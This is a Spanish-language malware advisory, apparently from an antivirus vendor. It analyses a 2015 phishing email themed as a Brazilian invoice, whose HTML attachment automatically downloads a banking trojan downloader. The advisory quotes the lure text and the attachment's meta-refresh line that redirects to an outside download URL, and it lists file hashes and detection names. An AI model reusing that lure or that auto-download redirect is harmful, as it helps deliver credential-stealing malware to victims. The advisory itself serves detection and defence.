VARIANTE DE SPY BANKER QUE LLEGA POR MAIL EN UN ANEXADO HTML CON FORMATO MIME

Otra historia para no dormir ! … Se recibe un mail con formato MIME, que simplemente por abrirlo, se autoejecuta el HTML anexado que autodescarga malwares, que instalan un cazapasswords bancario …

El mail malicioso que se recibe conteniendo el HTML MIME tiene el siguiente formato:

MAIL MALICIOSO
______________

Asunto: RE:Nota Fiscal

“Estou mandando anexado a nota fiscal, confira os produtos e confirme
o recebimento do email por gentileza. Desculpa a demora.
Atenciosamente
Julio Cesar”

ANEXADO : NF-Eletronica_25-02-2015.html <—– HTML en formato MIME que autodescarga malwares

_____________________
FIN DEL MAIL MALICIOSO

El mail, con formato MIME, solamente por abrirlo lanza el HTML adjunto

“NF-Eletronica_25-02-2015.html” el cual contiene…

<meta http-equiv=”refresh” content=”0; url=http://x.co/Abrir?%7775843%NOTA_FISCAL-ELETRONICA_XML.zip?dl=1″>

que hace una descarga directa de “Nota-FiscalEletronica.rar.zip” que contiene “NF-E_0005241.exe”

El fichero que se autodescarga, subido al virustotal, ofrece el siguiente informe:
MD5 5f13149667840e207ccc62638c60c9a7
SHA1 c9f51afbe030c3d640c7ad58319655d76123fd58
Tamaño del fichero 884.5 KB ( 905728 bytes )
SHA256: 81436fa4a40636e26c478b5a8011dfe6191ea714c3666cd43a5661996eb46491
Nombre: NF-E_0005241.exe
Detecciones: 21 / 57
Fecha de análisis: 2015-02-26 08:35:39 UTC ( hace 0 minutos )

0 1
Antivirus Resultado Actualización
AVG Win32/DH{gQx8gQ4gJVcPgRI} 20150226
Ad-Aware Trojan.GenericKD.2186222 20150226
Avast Win32:Malware-gen 20150226
Baidu-International Trojan.Win32.Banload.VDG 20150226
BitDefender Trojan.GenericKD.2186222 20150226
ESET-NOD32 a variant of Win32/TrojanDownloader.Banload.VDG 20150226
Emsisoft Trojan.GenericKD.2186222 (B) 20150226
F-Secure Trojan.GenericKD.2186222 20150226
Fortinet W32/Banload.VDG!tr.dldr 20150226
GData Trojan.GenericKD.2186222 20150226
Ikarus Trojan-Downloader.Win32.Banload 20150226
K7AntiVirus Trojan-Downloader ( 004b5c081 ) 20150226
K7GW Trojan-Downloader ( 004b5c081 ) 20150226
Kaspersky HEUR:Trojan-Downloader.Win32.Generic 20150226
McAfee Artemis!5F1314966784 20150226
McAfee-GW-Edition BehavesLike.Win32.BadFile.ch 20150226
MicroWorld-eScan Trojan.GenericKD.2186222 20150226
Norman Malware 20150225
Qihoo-360 HEUR/QVM05.1.Malware.Gen 20150226
TrendMicro-HouseCall Suspicious_GEN.F47V0225 20150226
VBA32 suspected of Trojan.Downloader.gen.h 20150225

Al ejecutarlo descarga 4 EXES , tres con nombre del equipo y un numero y un cuarto con el nombre de TR.EXE, que subido al virustotal ofrece el siguiente informe:

MD5 b89f99d0e29ed72ef5766133a7a95c44
SHA1 c2567fb5701a70b28b055c4b78abe6733c17164d
Tamaño del fichero 1.1 MB ( 1133056 bytes )
SHA256: 14888be22983eaad52048ad98a16df958a4f14f5b2dcf88d316d8c4e32eed66a
Nombre: tr.exe
Detecciones: 16 / 57
Fecha de análisis: 2015-02-26 08:50:30 UTC ( hace 0 minutos )

0 1

Antivirus Resultado Actualización
Agnitum Trojan.Avenger.Gen.EI 20150225
Avira TR/Dldr.Delphi.Gen 20150226
Baidu-International Hacktool.Win32.Deleter.i 20150226
Fortinet Riskware/Deleter 20150226
Ikarus Virus.Win32.DelfInject 20150226
K7AntiVirus Riskware ( 0040eff71 ) 20150226
K7GW Riskware ( 0040eff71 ) 20150226
Kaspersky not-a-virus:RiskTool.Win32.Deleter.i 20150226
McAfee Artemis!B89F99D0E29E 20150226
McAfee-GW-Edition BehavesLike.Win32.BadFile.tc 20150226
NANO-Antivirus Riskware.Win32.Deleter.cxhofi 20150226
Qihoo-360 HEUR/QVM41.1.Malware.Gen 20150226
Sophos Generic PUA MC 20150226
TotalDefense Win32/Crykee.I 20150226
TrendMicro-HouseCall TROJ_GEN.R08HH07BP15 20150226
VBA32 BScope.Trojan.Dropper.we 20150225

Dicha version del ELISTARA 31.75 que los detecta y elimina, estará disponible en nuestra web a partir de las 19 h CEST de hoy

saludos

ms, 26-2-2015